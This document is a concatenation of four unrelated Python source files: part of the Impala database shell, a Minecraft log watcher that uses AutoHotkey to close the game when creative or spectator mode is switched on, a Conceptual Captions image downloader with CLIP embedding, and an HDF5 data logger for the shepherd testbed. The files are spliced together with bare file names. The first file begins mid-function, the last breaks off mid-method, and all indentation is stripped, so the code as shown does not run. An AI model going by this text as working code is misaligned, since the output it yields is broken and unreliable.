# Get the database and table name, using the current database if the table name
# wasn't fully qualified.
db_name, tbl_name = self.current_db, arg
if db_name is None:
db_name = ImpalaShell.DEFAULT_DB
db_table_name = arg.split('.')
if len(db_table_name) == 1:
return db_name, db_table_name[0]
if len(db_table_name) == 2:
return db_table_name
def do_alter(self, args):
query = BeeswaxService.Query()
query.query = "alter %s" % (args,)
query.configuration = self.__options_to_string_list()
return self.__query_with_results(query)
def do_create(self, args):
query = self.__create_beeswax_query_handle()
query.query = "create %s" % (args,)
query.configuration = self.__options_to_string_list()
return self.__query_with_results(query)
def do_drop(self, args):
query = self.__create_beeswax_query_handle()
query.query = "drop %s" % (args,)
query.configuration = self.__options_to_string_list()
return self.__query_with_results(query)
def do_profile(self, args):
"""Prints the runtime profile of the last INSERT or SELECT query executed."""
if len(args) > 0:
print "'profile' does not accept any arguments"
return False
elif self.last_query_handle is None:
print 'No previous query available to profile'
return False
self.__print_runtime_profile(self.last_query_handle)
return True
def do_select(self, args):
"""Executes a SELECT... query, fetching all rows"""
query = self.__create_beeswax_query_handle()
query.query = "select %s" % (args,)
query.configuration = self.__options_to_string_list()
return self.__query_with_results(query)
def do_use(self, args):
"""Executes a USE... query"""
query = self.__create_beeswax_query_handle()
query.query = "use %s" % (args,)
query.configuration = self.__options_to_string_list()
result = self.__query_with_results(query)
if result:
self.current_db = args
return result
def do_show(self, args):
"""Executes a SHOW... query, fetching all rows"""
query = self.__create_beeswax_query_handle()
query.query = "show %s" % (args,)
query.configuration = self.__options_to_string_list()
return self.__query_with_results(query)
def do_describe(self, args):
"""Executes a DESCRIBE... query, fetching all rows"""
query = self.__create_beeswax_query_handle()
query.query = "describe %s" % (args,)
query.configuration = self.__options_to_string_list()
return self.__query_with_results(query)
def do_desc(self, args):
return self.do_describe(args)
def do_insert(self, args):
"""Executes an INSERT query"""
query = self.__create_beeswax_query_handle()
query.query = "insert %s" % (args,)
query.configuration = self.__options_to_string_list()
print "Query: %s" % (query.query,)
start, end = time.time(), 0
(handle, status) = self.__do_rpc(lambda: self.imp_service.query(query))
if status != RpcStatus.OK:
return False
query_successful = True
while True:
query_state = self.__get_query_state(handle)
if query_state == self.query_state["FINISHED"]:
break
elif query_state == self.query_state["EXCEPTION"]:
print 'Query failed'
if self.connected:
# Retrieve error message (if any) from log.
log, status = self._ImpalaShell__do_rpc(
lambda: self.imp_service.get_log(handle.log_context))
print log,
query_successful = False
break
else:
return False
elif self.is_interrupted.isSet():
return self.__cancel_query(handle)
time.sleep(0.05)
(insert_result, status) = self.__do_rpc(lambda: self.imp_service.CloseInsert(handle))
end = time.time()
if status != RpcStatus.OK or self.is_interrupted.isSet():
return False
if query_successful:
self.__print_runtime_profile_if_enabled(handle)
num_rows = sum([int(k) for k in insert_result.rows_appended.values()])
self.__print_if_verbose("Inserted %d rows in %2.2fs" % (num_rows, end - start))
self.last_query_handle = handle
return query_successful
def __cancel_query(self, handle):
"""Cancel a query on a keyboard interrupt from the shell."""
print 'Cancelling query ...'
# Cancel sets query_state to EXCEPTION before calling cancel() in the
# co-ordinator, so we don't need to wait.
(_, status) = self.__do_rpc(lambda: self.imp_service.Cancel(handle))
if status != RpcStatus.OK:
return False
return True
def __get_query_state(self, handle):
state, status = self.__do_rpc(lambda : self.imp_service.get_state(handle))
if status != RpcStatus.OK:
return self.query_state["EXCEPTION"]
return state
def __get_runtime_profile(self, handle):
profile, status = self.__do_rpc(lambda: self.imp_service.GetRuntimeProfile(handle))
if status == RpcStatus.OK and profile:
return profile
def __do_rpc(self, rpc):
"""Creates a child thread which executes the provided callable.
Blocks until the child thread terminates. Reads its results, if any,
from a Queue object. The child thread puts its results in the Queue object
upon completion.
"""
# The queue is responsible for passing the rpc results from __do_rpc_thread
# to __do_rpc.
# TODO: Investigate whether this can be done without using a Queue object.
rpc_results = Queue()
rpc_thread = threading.Thread(target=self.__do_rpc_thread, args=[rpc, rpc_results])
rpc_thread.start()
rpc_thread.join()
# The results should be in the queue. If they're not, return (None, RpcStatus.ERROR)
try:
results = rpc_results.get_nowait()
except Empty:
# Unexpected exception in __do_rpc_thread.
print 'Unexpected exception, no results returned.'
results = (None, RpcStatus.ERROR)
return results
def __do_rpc_thread(self, rpc, rpc_results):
"""Executes the RPC lambda provided with some error checking.
Puts the result tuple in the result queue. The result tuple is
(rpc_result, RpcStatus.OK) if the rpc succeeded, (None, RpcStatus.ERROR)
if it failed. If an exception occurs that cannot be recovered from,
the connection will be closed and self.connected will be set to False.
(None, RpcStatus.ERROR) will be put in the queue.
"""
if not self.connected:
print "Not connected (use CONNECT to establish a connection)"
rpc_results.put((None, RpcStatus.ERROR))
try:
ret = rpc()
status = RpcStatus.OK
# TODO: In the future more advanced error detection/handling can be done based on
# the TStatus return value. For now, just print any error(s) that were encountered
# and validate the result of the operation was a succes.
if ret is not None and isinstance(ret, TStatus):
if ret.status_code != TStatusCode.OK:
if ret.error_msgs:
print 'RPC Error: %s' % '\n'.join(ret.error_msgs)
status = RpcStatus.ERROR
rpc_results.put((ret, status))
except BeeswaxService.QueryNotFoundException, q:
print 'Error: Stale query handle'
# beeswaxException prints out the entire object, printing
# just the message is far more readable/helpful.
except BeeswaxService.BeeswaxException, b:
print "ERROR: %s" % (b.message,)
except TTransportException, e:
print "Error communicating with impalad: %s" % (e,)
self.connected = False
self.prompt = ImpalaShell.DISCONNECTED_PROMPT
except TApplicationException, t:
print "Application Exception : %s" % (t,)
except Exception, u:
print 'Unknown Exception : %s' % (u,)
self.connected = False
self.prompt = ImpalaShell.DISCONNECTED_PROMPT
rpc_results.put((None, RpcStatus.ERROR))
def do_explain(self, args):
"""Explain the query execution plan"""
query = self.__create_beeswax_query_handle()
# Args is all text except for 'explain', so no need to strip it out
query.query = args
query.configuration = self.__options_to_string_list()
print "Explain query: %s" % (query.query,)
(explanation, status) = self.__do_rpc(lambda: self.imp_service.explain(query))
if status != RpcStatus.OK:
return False
print explanation.textual
return True
def do_refresh(self, args):
"""Reload the Impalad catalog"""
status = RpcStatus.ERROR
if not args:
(_, status) = self.__do_rpc(lambda: self.imp_service.ResetCatalog())
if status == RpcStatus.OK:
self.__print_if_verbose("Successfully refreshed catalog")
else:
db_table_name = self.__parse_table_name_arg(args)
if db_table_name is None:
print 'Usage: refresh [databaseName.][tableName]'
return False
(_, status) = self.__do_rpc(
lambda: self.imp_service.ResetTable(TResetTableReq(*db_table_name)))
if status == RpcStatus.OK:
self.__print_if_verbose(
"Successfully refreshed table: %s" % '.'.join(db_table_name))
return status == RpcStatus.OK
def do_history(self, args):
"""Display command history"""
# Deal with readline peculiarity. When history does not exists,
# readline returns 1 as the history length and stores 'None' at index 0.
if self.readline and self.readline.get_current_history_length() > 0:
for index in xrange(1, self.readline.get_current_history_length() + 1):
cmd = self.readline.get_history_item(index)
print '[%d]: %s' % (index, cmd)
else:
print 'readline module not found, history is not supported.'
return True
def preloop(self):
"""Load the history file if it exists"""
if self.readline:
try:
self.readline.read_history_file(self.history_file)
except IOError, i:
print 'Unable to load history: %s' % i
def postloop(self):
"""Save session commands in history."""
if self.readline:
try:
self.readline.write_history_file(self.history_file)
except IOError, i:
print 'Unable to save history: %s' % i
def default(self, args):
print "Unrecognized command"
return True
def emptyline(self):
"""If an empty line is entered, do nothing"""
return True
def do_version(self, args):
"""Prints the Impala build version"""
print "Shell version: %s" % VERSION_STRING
print "Server version: %s" % self.server_version
return True
WELCOME_STRING = """Welcome to the Impala shell. Press TAB twice to see a list of \
available commands.
Copyright (c) 2012 Cloudera, Inc. All rights reserved.
(Shell build version: %s)""" % VERSION_STRING
def parse_query_text(query_text):
"""Parse query file text and filter comments """
queries = sqlparse.split(query_text)
return map(strip_comments_from_query, queries)
def strip_comments_from_query(query):
"""Strip comments from an individual query """
#TODO: Make query format configurable by the user.
return sqlparse.format(query, strip_comments=True, reindent=True)
def execute_queries_non_interactive_mode(options):
"""Run queries in non-interactive mode."""
queries = []
if options.query_file:
try:
query_file_handle = open(options.query_file, 'r')
queries = parse_query_text(query_file_handle.read())
query_file_handle.close()
except Exception, e:
print 'Error: %s' % e
sys.exit(1)
elif options.query:
queries = parse_query_text(options.query)
shell = ImpalaShell(options)
# The impalad was specified on the command line and the connection failed.
# Return with an error, no need to process the query.
if options.impalad and shell.connected == False:
sys.exit(1)
queries = shell.cmdqueue + queries
# Deal with case.
sanitized_queries = []
for query in queries:
sanitized_queries.append(shell.sanitise_input(query, interactive=False))
for query in sanitized_queries:
if not shell.onecmd(query):
print 'Could not execute command: %s' % query
if not options.ignore_query_failure:
sys.exit(1)
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("-i", "--impalad", dest="impalad", default=socket.getfqdn(),
help="<host:port> of impalad to connect to")
parser.add_option("-q", "--query", dest="query", default=None,
help="Execute a query without the shell")
parser.add_option("-f", "--query_file", dest="query_file", default=None,
help="Execute the queries in the query file, delimited by ;")
parser.add_option("-k", "--kerberos", dest="use_kerberos", default=False,
action="store_true", help="Connect to a kerberized impalad")
parser.add_option("-o", "--output_file", dest="output_file", default=None,
help="If set, query results will be saved to the given file as well "\
"as output to the console. Results from multiple queries will be "\
"be append to the same file")
parser.add_option("--output_file_field_delim", dest="output_file_field_delim",
default=',', help="Field delimiter to use in the output file")
parser.add_option("-s", "--kerberos_service_name",
dest="kerberos_service_name", default=None,
help="Service name of a kerberized impalad, default is 'impala'")
parser.add_option("-V", "--verbose", dest="verbose", default=True, action="store_true",
help="Enable verbose output")
parser.add_option("-p", "--show_profiles", dest="show_profiles", default=False,
action="store_true",
help="Always display query profiles after execution")
parser.add_option("--quiet", dest="verbose", default=True, action="store_false",
help="Disable verbose output")
parser.add_option("-v", "--version", dest="version", default=False, action="store_true",
help="Print version information")
parser.add_option("-c", "--ignore_query_failure", dest="ignore_query_failure",
default=False, action="store_true", help="Continue on query failure")
parser.add_option("-r", "--refresh_after_connect", dest="refresh_after_connect",
default=False, action="store_true",
help="Refresh Impala catalog after connecting")
parser.add_option("-d", "--database", dest="default_db", default=None,
help="Issue a use database command on startup.")
options, args = parser.parse_args()
# Arguments that could not be parsed are stored in args. Print an error and exit.
if len(args) > 0:
print 'Error, could not parse arguments "%s"' % (' ').join(args)
parser.print_help()
sys.exit(1)
if options.version:
print VERSION_STRING
sys.exit(0)
if options.use_kerberos:
# The sasl module is bundled with the shell.
try:
import sasl
except ImportError:
print 'sasl not found.'
sys.exit(1)
from thrift_sasl import TSaslClientTransport
# The service name defaults to 'impala' if not specified by the user.
if not options.kerberos_service_name:
options.kerberos_service_name = 'impala'
print "Using service name '%s' for kerberos" % options.kerberos_service_name
elif options.kerberos_service_name:
print 'Kerberos not enabled, ignoring service name'
if options.output_file:
try:
# Make sure the given file can be opened for writing. This will also clear the file
# if successful.
open(options.output_file, 'wb')
except IOError, e:
print 'Error opening output file for writing: %s' % e
sys.exit(1)
if options.query or options.query_file:
execute_queries_non_interactive_mode(options)
sys.exit(0)
intro = WELCOME_STRING
shell = ImpalaShell(options)
while shell.is_alive:
try:
shell.cmdloop(intro)
except KeyboardInterrupt:
intro = '\n'
|
main.py
|
from time import sleep
from ahk import AHK
import os
from threading import Thread
ahk = AHK()
def read_file(file):
with open(file, 'r') as f:
read = f.read()
return read
def write_to_file(file, what):
with open(file, 'w') as f:
f.truncate(0)
f.write(what)
def ask_for_settings():
logs = input('input your logs folder: ')
return logs
# creating settings.txt if it doesn't exist
if os.path.isfile('settings.txt') == False:
with open('settings.txt', 'w') as f:
f.truncate(0)
# checking if settings.txt is empty
if os.stat('settings.txt').st_size == 0:
# if it is, ask user for settings
logs = ask_for_settings()
write_to_file('settings.txt', logs)
else:
# else, ask user if he wants to change settings
to_change_settings = input('do you wanna change your logs path? (Y/N): ')
if to_change_settings.upper() == 'Y':
logs = ask_for_settings()
write_to_file('settings.txt', logs)
else:
logs = read_file('settings.txt')
# checks if 'latest.log' exists in logs path
if os.path.isfile(f'{logs}\\latest.log'):
log = f'{logs}\\latest.log'
else:
print(f"latest.log doesn't exist in your logs path '{logs}' (you probably provided wrong path, restart the program)")
print("starting to check! (don't close this window)")
def warning():
ahk.run_script('''
MsgBox Don't try to check! (first and last warning)
''')
def close_game():
ahk.run_script('''
SetTitleMatchMode 2
WinGet PID, PID, Minecraft
Process, Close, %PID%
''')
def wait_for_minecraft():
ahk.run_script('''
SetTitleMatchMode 2
WinWait Minecraft* 1.16
''')
while True:
sleep(0.02)
with open(log, 'r') as f:
lines = f.readlines()
last_line = lines[-1]
if 'Local game hosted on port' in last_line:
Thread(target=warning).start()
while True:
sleep(0.02)
with open(log, 'r') as f:
lines = f.readlines()
last_line = lines[-1]
if 'Set own game mode to Spectator Mode' in last_line or 'Set own game mode to Creative Mode' in last_line:
# if user changes his gamemode to spectator or creative, close the game
close_game()
wait_for_minecraft()
break
if 'Stopping singleplayer server as player logged out' in last_line or 'Stopping worker threads' in last_line:
# else if user quits the world, stop checking for spectator or creative
break
|
parse_conceptual.py
|
import torch
import clip
from torch.utils.data import DataLoader, Dataset
from PIL import Image
import pickle
from tqdm import tqdm
import os
import csv
import threading
import requests
import shutil
import PIL
from typing import List, Tuple, Optional
import argparse
from pathlib import Path
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class ConceptualDS(Dataset):
@staticmethod
def get_all_data(data_root: str, suffix: str):
data = []
for i in range(2):
out_data_path = f"{data_root}/conceptual_{suffix}_{i:02d}.pkl"
if os.path.isfile(out_data_path):
with open(out_data_path, 'rb') as f:
raw_data = pickle.load(f)["info"]
data.append(raw_data)
return data
@staticmethod
def collect(data_root: str, suffix: str):
raw_data = ConceptualDS.get_all_data(data_root, suffix)
data = []
for thread_data in raw_data:
for item in thread_data:
data.append((item, thread_data[item]["caption"]))
return data
def __len__(self):
return len(self.data)
def __getitem__(self, item: int):
image_name, caption = self.data[item]
image_path = f"{self.data_root}/{self.suffix}/{image_name}.jpg"
is_error = False
image = self.dummy
try:
image = self.preprocess(Image.open(image_path)) #.resize(224))
except PIL.UnidentifiedImageError:
is_error = True
except OSError:
is_error = True
except BaseException:
is_error = True
if is_error:
return image, "", image_name
return image, caption, image_name
def __init__(self, data_root: str, preprocess, suffix: str):
self.suffix = suffix
self.data_root = data_root
self.data = self.collect(data_root, suffix)
# print(self.data)
self.preprocess = preprocess
self.dummy = torch.zeros(3, 224, 224)
def save_pickle(data, out_path: str, recover_index: Optional[int] = None):
if os.path.isfile(out_path) and recover_index is not None:
recover_path = f'{out_path[:-4]}_{recover_index:02d}.pkl'
shutil.copyfile(out_path, recover_path)
with open(out_path, 'wb') as f:
pickle.dump(data, f)
def get_image(url: str, out_path: str, timeout=10):
try:
r = requests.get(url, stream=True, timeout=timeout)
if r.status_code == 200:
with open(out_path, 'wb') as f:
r.raw.decode_content = True
shutil.copyfileobj(r.raw, f)
return True
return False
except BaseException:
return False
def thread(urls: List[Tuple[List[str], int]], thread_id: int, progress: tqdm, lock: Optional[threading.Lock],
suffix: str, conceptual_root: str):
out_root = f"{conceptual_root}/{suffix}"
out_data_path = f"{conceptual_root}/conceptual_{suffix}_{thread_id:02d}.pkl"
recover_index = 0
if os.path.isfile(out_data_path):
with open(out_data_path, 'rb') as f:
data = pickle.load(f)
# print(data)
parsed = data['parsed']
info = data['info']
else:
parsed = set()
info = {}
for i in range(0, len(urls)):
(caption, url), ind = urls[i]
name = f"{ind:08d}"
out_path = f"{out_root}/{name}.jpg"
if url not in parsed and not os.path.isfile(out_path) and get_image(url, out_path):
parsed.add(url)
info[name] = {"url": url, "caption": caption}
if lock is not None:
lock.acquire()
try:
progress.update()
finally:
lock.release()
else:
progress.update()
if (i + 1) % 10 == 0:
# print(f'BINNEN = {info}')
save_pickle({'parsed': parsed, 'info': info}, out_data_path, recover_index)
recover_index = 1 - recover_index
# print(f'BUITEN = {info}')
save_pickle({'parsed': parsed, 'info': info}, out_data_path, 2)
return 0
def download_conceptual(conceptual_root: str, num_threads: int, num_images: int):
urls = []
for suffix in ( "train", "val"):
if suffix == "train":
training_path = f"{conceptual_root}/Train_GCC-training.tsv"
with open(training_path, 'r') as f:
lines = f.readlines()
lines = lines[:num_images]
train_sub_set_path = f'{conceptual_root}/subset_Train_GCC-training.tsv'
if not os.path.exists(train_sub_set_path):
myfile = Path(train_sub_set_path)
myfile.touch(exist_ok=True)
with open(train_sub_set_path, 'w') as f:
for line in lines:
f.write(line)
tsv_path = train_sub_set_path
else:
val_path = f'{conceptual_root}/Validation_GCC-1.1.0-Validation.tsv'
with open(val_path, 'r') as f:
lines = f.readlines()
lines = lines[:num_images]
val_sub_set_path = f'{conceptual_root}/subset_Val_GCC-training.tsv'
if not os.path.exists(val_sub_set_path):
myfile = Path(val_sub_set_path)
myfile.touch(exist_ok=True)
with open(val_sub_set_path, 'w') as f:
for line in lines:
f.write(line)
tsv_path = val_sub_set_path
with open(tsv_path) as f:
read_tsv = csv.reader(f, delimiter="\t")
for i, row in enumerate(read_tsv):
urls.append((row, i))
progress = tqdm(total=len(urls))
if num_threads == 1:
thread(urls, 0, progress, None, suffix, conceptual_root)
else:
groups = []
threads = []
lock = threading.Lock()
split_size = len(urls) // num_threads
for i in range(num_threads):
if i < num_threads - 1:
groups.append(urls[i * split_size: (i + 1) * split_size])
else:
groups.append(urls[i * split_size:])
for i in range(num_threads):
threads.append(threading.Thread(target=thread, args=(groups[i], i, progress, lock, suffix, conceptual_root)))
for i in range(num_threads):
threads[i].start()
for i in range(num_threads):
threads[i].join()
progress.close()
def add_period(caption: str):
caption = caption.strip()
if caption[-1] != '.':
caption = caption + '.'
elif caption[-2] == ' ':
caption = caption[:-2] + '.'
return caption
def create_clip_embeddings(conceptual_root: str, clip_model_type: str):
all_embeddings = []
all_captions = []
for suffix in ("train", "val"):
clip_model, preprocess = clip.load(clip_model_type, device=device, jit=False)
clip_model = clip_model.eval()
ds = ConceptualDS(conceptual_root, preprocess, suffix)
dl = DataLoader(ds, batch_size=2, shuffle=False, drop_last=False)
progress = tqdm(total=len(dl))
counter = 0
clip_model_name = clip_model_type.replace('/', '_')
out_data_path = f"{conceptual_root}/conceptual_clip_{clip_model_name}_{suffix}.pkl"
recover_index = 0
for i, data in enumerate(dl):
images, captions, image_names = data
images = images.to(device)
with torch.no_grad():
prefix = clip_model.encode_image(images).to(device)
# print(f'prefix.shape = {prefix.shape}')
is_valid = list(map(lambda x: x != "", captions))
mask = torch.tensor(is_valid)
all_embeddings.append(prefix[mask])
captions = [caption for j, caption in enumerate(captions) if is_valid[j]]
image_names = [image_name for j, image_name in enumerate(image_names) if is_valid[j]]
all_captions.extend([{"caption": add_period(caption), "clip_embedding": counter + j, "image_id": image_name}
for j, (caption, image_name) in enumerate(zip(captions, image_names))])
progress.update()
counter += len(captions)
if (i + 1) % 1000 == 0:
save_pickle({"clip_embedding": torch.cat(all_embeddings, dim=0), "captions": all_captions}, out_data_path, recover_index)
recover_index = 1 - recover_index
save_pickle({"clip_embedding": torch.cat(all_embeddings, dim=0), "captions": all_captions}, out_data_path, 2)
progress.close()
return 0
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--data_root', default='./data/conceptual')
parser.add_argument('--clip_model_type', default="ViT-B/32", choices=('RN50', 'RN101', 'RN50x4', 'ViT-B/32'))
parser.add_argument('--num_threads', type=int, default=1)
args = parser.parse_args()
download_conceptual(args.data_root, args.num_threads, 100)
create_clip_embeddings(args.data_root, args.clip_model_type)
if __name__ == '__main__':
main()
|
datalog.py
|
# -*- coding: utf-8 -*-
"""
shepherd.datalog
~~~~~
Provides classes for storing and retrieving sampled IV data to/from
HDF5 files.
:copyright: (c) 2019 Networked Embedded Systems Lab, TU Dresden.
:license: MIT, see LICENSE for more details.
"""
import logging
import subprocess
import threading
import time
from typing import NoReturn, Union
import numpy as np
from pathlib import Path
import h5py
from itertools import product
from collections import namedtuple
import psutil as psutil
import serial
import yaml
from shepherd.calibration import CalibrationData
from shepherd.calibration import cal_channel_harvest_dict
from shepherd.calibration import cal_channel_emulation_dict
from shepherd.calibration import cal_parameter_list
from shepherd.shepherd_io import DataBuffer
from shepherd.commons import GPIO_LOG_BIT_POSITIONS, MAX_GPIO_EVT_PER_BUFFER
logger = logging.getLogger(__name__)
"""
An entry for an exception to be stored together with the data consists of a
timestamp, a custom message and an arbitrary integer value
"""
ExceptionRecord = namedtuple(
"ExceptionRecord", ["timestamp", "message", "value"]
)
monitors_end = threading.Event()
def unique_path(base_path: Union[str, Path], suffix: str):
counter = 0
while True:
path = base_path.with_suffix(f".{ counter }{ suffix }")
if not path.exists():
return path
counter += 1
def add_dataset_time(grp: h5py.Group, length: int, chunks: Union[bool, tuple] = True) -> NoReturn:
grp.create_dataset(
"time",
(length,),
dtype="u8",
maxshape=(None,),
chunks=chunks,
compression=LogWriter.compression_algo,
)
grp["time"].attrs["unit"] = f"ns"
grp["time"].attrs["description"] = "system time [ns]"
class LogWriter(object):
"""Stores data coming from PRU's in HDF5 format
Args:
store_path (Path): Name of the HDF5 file that data will be written to
calibration_data (CalibrationData): Data is written as raw ADC
values. We need calibration data in order to convert to physical
units later.
mode (str): Indicates if this is data from recording or emulation
force_overwrite (bool): Overwrite existing file with the same name
samples_per_buffer (int): Number of samples contained in a single
shepherd buffer
samplerate_sps (int): Duration of a single shepherd buffer in
nanoseconds
"""
# choose lossless compression filter
# - gzip: good compression, moderate speed, select level from 1-9, default is 4
# - lzf: low to moderate compression, very fast, no options -> 20 % overhead for half the filesize
# NOTE for quick and easy performance improvement: remove compression for monitor-datasets, or even group_value
compression_algo = "lzf"
sys_log_intervall_ns = 1 * (10 ** 9) # step-size is 1 s
sys_log_next_ns = 0
dmesg_mon_t = None
ptp4l_mon_t = None
uart_mon_t = None
def __init__(
self,
store_path: Path,
calibration_data: CalibrationData,
mode: str = "harvesting",
force_overwrite: bool = False,
samples_per_buffer: int = 10_000,
samplerate_sps: int = 100_000,
skip_voltage: bool = False,
skip_current: bool = False,
skip_gpio: bool = False,
):
if force_overwrite or not store_path.exists():
self.store_path = store_path
logger.info(f"Storing data to '{self.store_path}'")
else:
base_dir = store_path.resolve().parents[0]
self.store_path = unique_path(
base_dir / store_path.stem, store_path.suffix
)
logger.warning(
f"File {store_path} already exists.. "
f"storing under {self.store_path} instead"
)
# Refer to shepherd/calibration.py for the format of calibration data
self.mode = mode
self.calibration_data = calibration_data
self.chunk_shape = (samples_per_buffer,)
self.samplerate_sps = int(samplerate_sps)
self.sample_interval_ns = int(10**9 // samplerate_sps)
self.buffer_timeseries = self.sample_interval_ns * np.arange(samples_per_buffer).astype("u8")
self._write_voltage = not skip_voltage
self._write_current = not skip_current
self._write_gpio = (not skip_gpio) and ("emulat" in mode)
logger.debug(f"Set log-writing for voltage: {'enabled' if self._write_voltage else 'disabled'}")
logger.debug(f"Set log-writing for current: {'enabled' if self._write_current else 'disabled'}")
logger.debug(f"Set log-writing for gpio: {'enabled' if self._write_gpio else 'disabled'}")
# initial sysutil-reading and delta-history
self.sysutil_io_last = np.array(psutil.disk_io_counters()[0:4])
self.sysutil_nw_last = np.array(psutil.net_io_counters()[0:2])
# Optimization: allowing larger more effizient resizes (before .resize() was called per element)
# h5py v3.4 is taking 20% longer for .write_buffer() than v2.1
# this change speeds up v3.4 by 30% (even system load drops from 90% to 70%), v2.1 by 16%
inc_duration = int(100)
inc_length = int(inc_duration * samplerate_sps)
self.data_pos = 0
self.data_inc = inc_length
self.gpio_pos = 0
self.gpio_inc = MAX_GPIO_EVT_PER_BUFFER
self.sysutil_pos = 0
self.sysutil_inc = inc_duration
self.uart_pos = 0
self.uart_inc = 100
self.dmesg_pos = 0
self.dmesg_inc = 100
self.xcpt_pos = 0
self.xcpt_inc = 100
self.timesync_pos = 0
self.timesync_inc = inc_duration
# NOTE for possible optimization: align resize with chunk-size -> rely on autochunking -> inc = h5ds.chunks
def __enter__(self):
"""Initializes the structure of the HDF5 file
HDF5 is hierarchically structured and before writing data, we have to
setup this structure, i.e. creating the right groups with corresponding
data types. We will store 3 types of data in a LogWriter database: The
actual IV samples recorded either from the harvester (during recording)
or the target (during emulation). Any log messages, that can be used to
store relevant events or tag some parts of the recorded data. And lastly
the state of the GPIO pins.
"""
self._h5file = h5py.File(self.store_path, "w")
# show key parameters for h5-performance
settings = list(self._h5file.id.get_access_plist().get_cache())
logger.debug(f"H5Py Cache_setting={settings} (_mdc, _nslots, _nbytes, _w0)")
# Store the mode in order to allow user to differentiate harvesting vs emulation data
self._h5file.attrs["mode"] = self.mode # TODO: should be part of data-group
# Store voltage and current samples in the data group, both are stored as 4 Byte unsigned int
self.data_grp = self._h5file.create_group("data")
# the size of window_samples-attribute in harvest-data indicates ivcurves as input -> emulator uses virtual-harvester
self.data_grp.attrs["window_samples"] = 0 # will be adjusted by .embed_config()
add_dataset_time(self.data_grp, self.data_inc, self.chunk_shape)
self.data_grp.create_dataset(
"current",
(self.data_inc,),
dtype="u4",
maxshape=(None,),
chunks=self.chunk_shape,
compression=self.compression_algo,
)
self.data_grp["current"].attrs["unit"] = "A"
self.data_grp["current"].attrs["description"] = "current [A] = value * gain + offset"
self.data_grp.create_dataset(
"voltage",
(self.data_inc,),
dtype="u4",
maxshape=(None,),
chunks=self.chunk_shape,
compression=LogWriter.compression_algo,
)
self.data_grp["voltage"].attrs["unit"] = "V"
self.data_grp["voltage"].attrs["description"] = "voltage [V] = value * gain + offset"
for channel, parameter in product(["current", "voltage"], cal_parameter_list):
# TODO: not the cleanest cal-selection, maybe just hand the resulting two and rename them already to "current, voltage" in calling FN
cal_channel = cal_channel_harvest_dict[channel] if (self.mode == "harvesting") else cal_channel_emulation_dict[channel]
self.data_grp[channel].attrs[parameter] = self.calibration_data[self.mode][cal_channel][parameter]
# Create group for gpio data
self.gpio_grp = self._h5file.create_group("gpio")
add_dataset_time(self.gpio_grp, self.gpio_inc)
self.gpio_grp.create_dataset(
"value",
(self.gpio_inc,),
dtype="u2",
maxshape=(None,),
chunks=True,
compression=LogWriter.compression_algo,
)
self.gpio_grp["value"].attrs["unit"] = "n"
self.gpio_grp["value"].attrs["description"] = GPIO_LOG_BIT_POSITIONS
# Create group for exception logs, entry consists of a timestamp, a message and a value
self.xcpt_grp = self._h5file.create_group("exceptions")
add_dataset_time(self.xcpt_grp, self.xcpt_inc)
self.xcpt_grp.create_dataset(
"message",
(self.xcpt_inc,),
dtype=h5py.special_dtype(vlen=str), # TODO: switch to string_dtype() (h5py >v3.0)
maxshape=(None,),
chunks=True,
)
self.xcpt_grp.create_dataset("value", (self.xcpt_inc,), dtype="u4", maxshape=(None,), chunks=True)
self.xcpt_grp["value"].attrs["unit"] = "n"
# UART-Logger
self.uart_grp = self._h5file.create_group("uart")
add_dataset_time(self.uart_grp, self.uart_inc)
# Every log entry consists of a timestamp and a message
self.uart_grp.create_dataset(
"message",
(self.uart_inc,),
dtype=h5py.special_dtype(vlen=bytes),
maxshape=(None,),
chunks=True,
)
self.uart_grp["message"].attrs["description"] = f"raw ascii-bytes"
# Create sys-Logger
self.sysutil_grp = self._h5file.create_group("sysutil")
add_dataset_time(self.sysutil_grp, self.sysutil_inc, (self.sysutil_inc,))
self.sysutil_grp["time"].attrs["unit"] = "ns"
self.sysutil_grp["time"].attrs["description"] = "system time [ns]"
self.sysutil_grp.create_dataset("cpu", (self.sysutil_inc,), dtype="u1", maxshape=(None,), chunks=(self.sysutil_inc,), )
self.sysutil_grp["cpu"].attrs["unit"] = "%"
self.sysutil_grp["cpu"].attrs["description"] = "cpu_util [%]"
self.sysutil_grp.create_dataset("ram", (self.sysutil_inc, 2), dtype="u1", maxshape=(None, 2), chunks=(self.sysutil_inc, 2), )
self.sysutil_grp["ram"].attrs["unit"] = "%"
self.sysutil_grp["ram"].attrs["description"] = "ram_available [%], ram_used [%]"
self.sysutil_grp.create_dataset("io", (self.sysutil_inc, 4), dtype="u8", maxshape=(None, 4), chunks=(self.sysutil_inc, 4), )
self.sysutil_grp["io"].attrs["unit"] = "n"
self.sysutil_grp["io"].attrs["description"] = "io_read [n], io_write [n], io_read [byte], io_write [byte]"
self.sysutil_grp.create_dataset("net", (self.sysutil_inc, 2), dtype="u8", maxshape=(None, 2), chunks=(self.sysutil_inc, 2), )
self.sysutil_grp["net"].attrs["unit"] = "n"
self.sysutil_grp["net"].attrs["description"] = "nw_sent [byte], nw_recv [byte]"
self.sys_log_next_ns = int(time.time()) * (10 ** 9)
self.log_sys_stats()
# Create dmesg-Logger -> consists of a timestamp and a message
self.dmesg_grp = self._h5file.create_group("dmesg")
add_dataset_time(self.dmesg_grp, self.dmesg_inc)
self.dmesg_grp.create_dataset(
"message",
(self.dmesg_inc,),
dtype=h5py.special_dtype(vlen=str),
maxshape=(None,),
chunks=True,
)
# Create timesync-Logger
self.timesync_grp = self._h5file.create_group("timesync")
add_dataset_time(self.timesync_grp, self.timesync_inc)
self.timesync_grp.create_dataset("value", (self.timesync_inc, 3), dtype="i8", maxshape=(None, 3), chunks=True)
self.timesync_grp["value"].attrs["unit"] = "ns, Hz, ns"
self.timesync_grp["value"].attrs["description"] = "master offset [ns], s2 freq [Hz], path delay [ns]"
return self
def embed_config(self, data: dict) -> NoReturn:
"""
Important Step to get a self-describing Output-File
Note: the size of window_samples-attribute in harvest-data indicates ivcurves as input -> emulator uses virtual-harvester
:param data: from virtual harvester or converter / source
:return: None
"""
self.data_grp.attrs["config"] = yaml.dump(data, default_flow_style=False)
if "window_samples" in data:
self.data_grp.attrs["window_samples"] = data["window_samples"]
def __exit__(self, *exc):
global monitors_end
monitors_end.set()
time.sleep(0.1)
# meantime: trim over-provisioned parts
self.data_grp["time"].resize((self.data_pos if self._write_current or self._write_voltage else 0,))
self.data_grp["voltage"].resize((self.data_pos if self._write_voltage else 0,))
